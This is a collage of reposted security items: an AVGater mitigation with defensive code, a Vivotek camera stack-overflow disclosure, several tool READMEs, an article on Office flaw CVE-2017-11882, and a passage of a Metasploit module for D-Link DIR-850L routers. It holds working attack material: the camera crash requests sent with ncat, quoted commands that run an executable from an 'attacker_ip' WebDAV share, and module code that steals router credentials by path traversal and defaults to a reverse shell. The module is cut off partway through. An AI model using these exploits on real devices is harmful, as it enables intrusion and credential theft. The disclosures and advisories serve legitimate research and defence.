Generally, it’s pretty simple: Always install updates in a timely manner. However, as some vendors still need a few more days to release their fix, it may take a little while until everyone is protected. Furthermore, as #AVGater can only be exploited if the user is allowed to restore previously quarantined files, I recommend everyone within a corporate environment to block normal users from restoring identified threats. This is wise in any way.

Source
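The post's own mitigation is administrative (patch, and stop normal users from restoring quarantined files). The following added example is not from the original post or from any AV vendor; it shows the check a privileged restore routine needs before writing a quarantined file back to its original location: refuse when any directory on the destination path is a symbolic link or junction, or when the resolved parent directory differs from the requested one. The function names, the `demo()` scenario and the temporary directories are constructed for illustration; on Linux and macOS the demo stands a symlink in for the NTFS directory junction the post describes, while on Windows the reparse-point attribute check covers real junctions.

```python
import os
import shutil
import tempfile

# Windows attribute bit carried by junctions and symlinks; os.lstat exposes it as
# st_file_attributes on Windows only, so on other platforms the check is a no-op.
FILE_ATTRIBUTE_REPARSE_POINT = 0x400


def _is_reparse_point(path):
    """True if `path` itself is a symlink, or on Windows any reparse point (junction)."""
    if os.path.islink(path):
        return True
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_REPARSE_POINT)


def restore_path_is_safe(original_path):
    """Decide whether a quarantined file may be restored to `original_path`.

    A privileged service that writes here must not follow a link planted by the
    unprivileged user, so every ancestor directory is inspected, not just the parent.
    """
    dest = os.path.abspath(original_path)
    parent = os.path.dirname(dest)
    current = parent
    while True:                      # walk parent -> root
        if _is_reparse_point(current):
            return False             # a junction anywhere in the chain redirects the write
        up = os.path.dirname(current)
        if up == current:
            break
        current = up
    if os.path.lexists(dest) and _is_reparse_point(dest):
        return False                 # the destination file itself is a link
    # Belt and braces: the resolved parent must be exactly the requested parent.
    return os.path.realpath(parent) == parent


def demo():
    """Constructed scenario: returns (honest restore allowed, redirected restore allowed)."""
    base = os.path.realpath(tempfile.mkdtemp(prefix="avgater_demo_"))
    try:
        downloads = os.path.join(base, "Downloads")      # where the file was quarantined from
        protected = os.path.join(base, "ProgramFiles")   # stands in for C:\Program Files
        os.mkdir(downloads)
        os.mkdir(protected)
        honest = restore_path_is_safe(os.path.join(downloads, "evil.dll"))
        # The step the post describes: the original directory is replaced by a
        # junction (a symlink here) that points at the protected location.
        os.rmdir(downloads)
        os.symlink(protected, downloads, target_is_directory=True)
        redirected = restore_path_is_safe(os.path.join(downloads, "evil.dll"))
        return honest, redirected
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Two caveats a practitioner would add: the check and the write must happen without a window for the directory to be swapped in between (open the parent with a handle that does not follow reparse points, then write relative to it), and a service that can instead drop its privileges and perform the restore as the requesting user removes the problem entirely.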
-
Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101.

[STX]

Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher
Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possibly more
Download Updated Firmware: http://www.vivotek.com/firmware/

[Timeline]
October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.

[Details]
Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek.

The stack overflow is triggered by "PUT" or "POST" request:

[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n

However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack:

"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"

This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request:

"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"

Notes:
1. B to I = $R4-$R11; X = $PC
2. Size of request available in $R3 at the LDMFD
3. Max request size: 9182 bytes (0x1FFF)
4. Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx)
5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes
6. Stack not protected with "Stack canaries"
7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a;
8. heap: Non-executable + Non-ASLR
9. stack: Non-executable + ASLR

[PoC]
$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80

(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76eb2c5c in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0  0x58585858 in ?? ()
#1  0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0             0x1        1
r1             0x47210    291344
r2             0x0        0
r3             0x75       117
r4             0x42424242 1111638594
r5             0x43434343 1128481603
r6             0x44444444 1145324612
r7             0x45454545 1162167621
r8             0x46464646 1179010630
r9             0x47474747 1195853639
r10            0x48484848 1212696648
r11            0x49494949 1229539657
r12            0x1        1
sp             0x7e92dac0 0x7e92dac0
lr             0x188f4    100596
pc             0x58585858 0x58585858
cpsr           0x60000010 1610612752
(gdb)

$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80

(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76e82c5c in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0  0x58585858 in ?? ()
#1  0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0             0x1        1
r1             0x47210    291344
r2             0x0        0
r3             0x4f       79
r4             0x42424242 1111638594
r5             0x43434343 1128481603
r6             0x44444444 1145324612
r7             0x45454545 1162167621
r8             0x46464646 1179010630
r9             0x47474747 1195853639
r10            0x48484848 1212696648
r11            0x49494949 1229539657
r12            0x1        1
sp             0x7ec9cac0 0x7ec9cac0
lr             0x188f4    100596
pc             0x58585858 0x58585858
cpsr           0x60000010 1610612752
(gdb)

Have a nice day
/bashis

[ETX]

Source
-
-
weather

Weather via the command line. Uses the darksky.net API so it's super accurate. Also includes any current weather alerts in the output.

Installation

Binaries
darwin 386 / amd64
freebsd 386 / amd64
linux 386 / amd64 / arm / arm64
solaris amd64
windows 386 / amd64

Via Go
$ go get github.com/jessfraz/weather

Usage
--location, -l: Your address, can be in the format of just a zipcode or a city, state, or the full address. defaults to auto locating you based off your ip
--units, -u: The unit system to use. defaults to auto, other options are us, si, uk, uk2, ca; for more information on units see the darksky.net api
--days, -d: Days of weather to retrieve. defaults to the current weather, ie. 0 or 1
--ignore-alerts: Don't print alerts in weather output. defaults false
--hide-icon: Hide the weather icons from being output. defaults false
--server, -s: Weather API server uri. defaults to "https://geocode.jessfraz.com"

Examples
# get the current weather in your current location
$ weather

# change the units to metric
$ weather -l "Paris, France" -u si

# it will auto guess the units though so changing
# the location to paris will change the units to `si`
$ weather -l "Paris, France"

# get three days forecast for NY
$ weather -l 10028 -d 3

# or you can autolocate and get three days forecast
$ weather -d 3

# get the weather in Manhattan Beach, CA
# even includes alerts
$ weather -l "Manhattan Beach, CA"
#                    .;odc
#                  ;kXNNNO
#                .0NNO0NN:
#               'XNK; dNNl
#               KNX' 'XNK.
#              ,NNk cXNK,
#              ,NNk '0NNO:.
#            .'cXNXl;,. ,xXNNKOxxxk0Xx
#        'lOXNNNNNNNNNNXOo' ':oxkOXNNXc
#      cKNNKd:'. ..;d0NNKl ,xXNK,
#    .;:cclKNXd. .oXNXxOXNNXl
#  .cOXNNNNNNNO. .kNNNNNNNXOc.
#  lXNXx;. . . .;dXNXo
#  ONNd. oXN0.
#  dNNo cNNk
#  XNN. NNX
#  0NN' .NNK
#  ;XN0. .ONNc
#  ;XNXo. .lXNX:
#  .oXNX0dlcclx0Xo. .oXKxlccldOXNXd.
#  ,lk0KXXK0xKNN0o;.. ..;o0NNKx0KXXX0ko,
#              'lOXNNNNNNNNNNXOo,
#                :x0XNNX0x:.
#
#
# Current weather is Partly Cloudy in Manhattan Beach in California for July 14 at 4:14am EDT
# The temperature is 69.2°F, but it feels like 69.2°F
#
# Special Weather Statement for Los Angeles, CA
# ...THREAT OF MONSOONAL THUNDERSTORMS LATE TONIGHT THROUGH WEDNESDAY...
# A STRONG UPPER LEVEL HIGH PRESSURE SYSTEM CURRENTLY CENTERED OVER NEVADA
# WILL BRING INCREASING EAST TO SOUTHEAST FLOW OVER SOUTHERN
# CALIFORNIA. AS A RESULT...A SIGNIFICANT SURGE OF MONSOONAL MOISTURE
# WILL MOVE INTO SOUTHWEST CALIFORNIA LATE TONIGHT THROUGH WEDNESDAY.
# THE GREATEST THREAT OF SHOWERS AND THUNDERSTORMS WILL BE ACROSS THE
# MOUNTAINS AND ANTELOPE VALLEY LATE TONIGHT INTO TUESDAY. DUE TO THE
# EASTERLY UPPER LEVEL FLOW ON MONDAY...THERE WILL ALSO BE A SLIGHT
# CHANCE OF SHOWERS AND THUNDERSTORMS ACROSS MOST COASTAL AND VALLEY
# AREAS.
# THE DEEPER MONSOONAL MOISTURE WILL BRING THE POTENTIAL FOR BRIEF HEAVY
# RAINFALL WITH STORMS THAT DEVELOP ON MONDAY AND TUESDAY...ESPECIALLY
# ACROSS THE MOUNTAINS AND ANTELOPE VALLEY. WHILE STORMS ARE EXPECTED
# TO BE FAST MOVING...THERE WILL BE THE POTENTIAL FOR LOCALIZED FLOODING
# OF ROADWAYS AND ARROYOS. ON TUESDAY...THE THREAT OF THUNDERSTORMS IS
# EXPECTED TO REMAIN CONFINED TO THE MOUNTAINS AND DESERTS. WITH WEAKER
# UPPER LEVEL WINDS ON TUESDAY...STORMS WILL LIKELY MOVE SLOWER. AS A
# RESULT...THERE WILL BE AN INCREASED THREAT OF FLASH FLOODING.
# IT WILL NOT BE AS HOT ACROSS MUCH OF THE REGION TOMORROW DUE TO THE
# INCREASED MOISTURE AND CLOUD COVERAGE...WITH INTERIOR SECTIONS
# GENERALLY REMAINING IN THE 90S. HOWEVER...THERE WILL BE A
# SIGNIFICANT INCREASE IN HUMIDITY ON MONDAY THAT WILL CONTINUE TO
# BRING DISCOMFORT.
# ANYONE PLANNING OUTDOOR ACTIVITIES IN THE MOUNTAINS AND DESERTS
# DURING THE NEXT FEW DAYS SHOULD CAREFULLY MONITOR THE LATEST
# NATIONAL WEATHER SERVICE FORECASTS AND STATEMENTS DUE TO THE
# POTENTIAL HAZARDS ASSOCIATED WITH THUNDERSTORMS.
# Created: July 13 at 10:50pm EDT
# Expires: July 14 at 7:00pm EDT
#
# Ick! The humidity is 85%
# The nearest storm is 18 miles NE away
# The wind speed is 3.96 mph SE
# The cloud coverage is 35%
# The visibility is 9.58 miles
# The pressure is 1012.99 mbar

Makefile Usage
$ make help
all        Runs a clean, build, fmt, lint, test, vet and install
build      Builds a dynamic executable or package
clean      Cleanup any build binaries or packages
cross      Builds the cross compiled binaries, creating a clean directory structure (eg. GOOS/GOARCH/binary)
fmt        Verifies all files have been `gofmt`ed
install    Installs the executable or package
lint       Verifies `golint` passes
release    Builds the cross compiled binaries, naming them in such a way for release (eg. binary-GOOS-GOARCH)
tag        Create a new git tag to prepare to build a release
test       Runs the go tests
vet        Verifies `go vet` passes

Download weather-master.zip

Source
-
Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container.

docker-onion-nmap

Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050.

Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses.

Example:

$ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.7s latency).
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds

How it works:

When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:

By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).

For example, this:

docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion

In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:

docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion

and

docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion

If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:

docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:

There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted connections to Tor while waiting for it to boot). Example:

$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

Notes:

No UDP available over Tor.
Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap.

gr33tz

@jessfraz tor-proxy
@zuazo alpine-tor-docker
shellhacks
crypto-rebels.de

Download: docker-onion-nmap-master.zip

or

git clone https://github.com/milesrichardson/docker-onion-nmap.git

Source
-
What is MHA:

Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can:

Identify hop delays.
Identify the source of the email.
Identify hop country.

MHA is an alternative for the following:

Name                     | Dev       | Issues
MessageHeader            | Google    | Not showing all the hops.
EmailHeaders             | Mxtoolbox | Not accurate and slow.
Message Header Analyzer  | Microsoft | Broken UI.

Installation:

Install system dependencies:

sudo apt-get update
sudo apt-get install python-pip
sudo pip install virtualenv

Create a Python virtual environment and activate it:

virtualenv virt
source virt/bin/activate

Clone the GitHub repo:

git clone https://github.com/lnxg33k/MHA.git

Install Python dependencies:

cd MHA
pip install -r requirements.txt

Run the development server:

python server.py -d

You can change the bind address or port by specifying the appropriate options:

python server.py -b 0.0.0.0 -p 8080

Everything should go well, now visit: http://localhost:8080

Docker

A Dockerfile is provided if you wish to build a docker image.

docker build -t mha:latest .

You can then run a container with:

docker run -d -p 8080:8080 mha:latest

Download MHA-master.zip

Source: https://github.com/lnxg33k/MHA
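The README lists what MHA extracts from headers (hops, hop delays, the originating host) but not how. The following added example is not MHA's code; it is a small stand-alone reconstruction of the core of that analysis using only the standard library: walk the Received headers in chronological order (they are prepended, so the last one in the message is the first hop), parse the timestamp after the final `;` of each, compute the delay between consecutive hops, and pull the first IP out of the earliest hop as the likely source. The message, hostnames and addresses are constructed sample data, not captured mail.

```python
import re
import email
from email.policy import default
from email.utils import parsedate_to_datetime

# Constructed sample message (documentation hostnames / RFC 5737 addresses).
SAMPLE_MESSAGE = (
    "Received: from mx3.example.net (mx3.example.net [203.0.113.30])\n"
    "\tby mail.example.org with ESMTPS id abc123;\n"
    "\tTue, 14 Nov 2017 10:05:40 +0000\n"
    "Received: from relay.example.com (relay.example.com [198.51.100.20])\n"
    "\tby mx3.example.net with ESMTP;\n"
    "\tTue, 14 Nov 2017 10:05:10 +0000\n"
    "Received: from [192.0.2.10] (helo=sender-pc)\n"
    "\tby relay.example.com with SMTP;\n"
    "\tTue, 14 Nov 2017 10:04:58 +0000\n"
    "From: alice@example.com\n"
    "To: bob@example.org\n"
    "Subject: constructed sample\n"
    "\n"
    "hello\n"
)

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_hops(raw_message):
    """Return the Received hops oldest-first, each with from/by/time/delay_seconds."""
    msg = email.message_from_string(raw_message, policy=default)
    # Unfold continuation lines so the regexes see one line per header.
    received = [" ".join(str(v).split()) for v in msg.get_all("Received", [])]
    hops, prev_time = [], None
    for text in reversed(received):          # reversed: message order is newest-first
        m_from = re.search(r"(?:^|\s)from\s+(\S+)", text)
        m_by = re.search(r"(?:^|\s)by\s+(\S+)", text)
        when = None
        if ";" in text:                      # RFC 5322: date-time follows the last ';'
            try:
                when = parsedate_to_datetime(text.rsplit(";", 1)[1].strip())
            except (TypeError, ValueError):
                when = None                  # unparseable clock; delay stays unknown
        delay = None
        if when is not None and prev_time is not None:
            delay = int((when - prev_time).total_seconds())
        hops.append({
            "from": m_from.group(1) if m_from else None,
            "by": m_by.group(1) if m_by else None,
            "time": when,
            "delay_seconds": delay,          # negative = clock skew or forged header
        })
        if when is not None:
            prev_time = when
    return hops


def source_ip(raw_message):
    """First IPv4 literal in the earliest hop: the best stdlib guess at the origin."""
    hops = parse_hops(raw_message)
    if not hops:
        return None
    msg = email.message_from_string(raw_message, policy=default)
    earliest = " ".join(str(msg.get_all("Received")[-1]).split())
    m = IPV4.search(earliest)
    return m.group(1) if m else None


def flag_hops(hops, max_delay=3600):
    """Indices of hops whose delay is negative or above max_delay seconds."""
    return [i for i, h in enumerate(hops)
            if h["delay_seconds"] is not None
            and (h["delay_seconds"] < 0 or h["delay_seconds"] > max_delay)]


if __name__ == "__main__":
    for i, hop in enumerate(parse_hops(SAMPLE_MESSAGE)):
        print(i, hop["from"], "->", hop["by"], hop["delay_seconds"])
    print("source:", source_ip(SAMPLE_MESSAGE))
```

Only the Received line written by your own border MTA can be trusted; everything below it in the chain was supplied by the previous hop and can be forged, which is why the earliest hop is reported as a guess and negative delays are flagged rather than silently dropped.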
-
-
You should be extra careful when opening files in MS Office.

When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

DEMO: Exploitation Allows Full System Take Over

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in the command prompt to disable registering of the component in Windows registry:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, run the following command:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Via thehackernews.com
-
-
This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DIR-850L (Un)authenticated OS Command Exec',
      'Description'    => %q{
        This module leverages an unauthenticated credential disclosure
        vulnerability to then execute arbitrary commands on DIR-850L routers
        as an authenticated user. Unable to use Meterpreter payloads.
      },
      'Author'         => [
        'Mumbai', # https://github.com/realoriginal (module)
        'Zdenda'  # vuln discovery
      ],
      'References'     => [
        ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
        ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
      ],
      'DisclosureDate' => 'Aug 9 2017',
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' },
      'Privileged'     => true,
      'Payload'        => { 'DisableNops' => true, },
      'Targets'        => [[ 'Automatic', {} ]],
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => '/',
        'method' => 'GET'
      })
      if res && res.headers['Server']
        auth = res.headers['Server']
        if auth =~ /DIR-850L/
          if auth =~ /WEBACCESS\/1\.0/
            return Exploit::CheckCode::Safe
          else
            return Exploit::CheckCode::Detected
          end
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
  # should write an auxiliary module to-do -> WRITE AUXILIARY
  def retrieve_creds
    begin
      xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
      xml << "<postxml>\r\n"
      xml << "<module>\r\n"
      xml << "  <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
      xml << "</module>\r\n"
      xml << "</postxml>"
      res = send_request_cgi({
        'uri'           => '/hedwig.cgi',
        'method'        => 'POST',
        'encode_params' => false,
        'headers'       => {
          'Accept-Encoding' => 'gzip, deflate',
          'Accept'          => '*/*'
        },
        'ctype'         => 'text/xml',
        'cookie'        => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
        'data'          => xml,
      })
      if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
        parse = res.get_xml_document
        username = parse.at('//name').text
        password = parse.at('//password').text
        vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
        loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
        print_good("#{peer} - Downloaded credentials to #{loot}")
        return username, password
      else
        fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  def retrieve_uid
    begin
      res = send_request_cgi({
        'uri'    => '/authentication.cgi',
        'method' => 'GET',
      })
      parse = res.get_json_document
      uid = parse['uid']
      challenge = parse['challenge']
      return uid, challenge
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  def login(username, password)
    uid, challenge = retrieve_uid
    begin
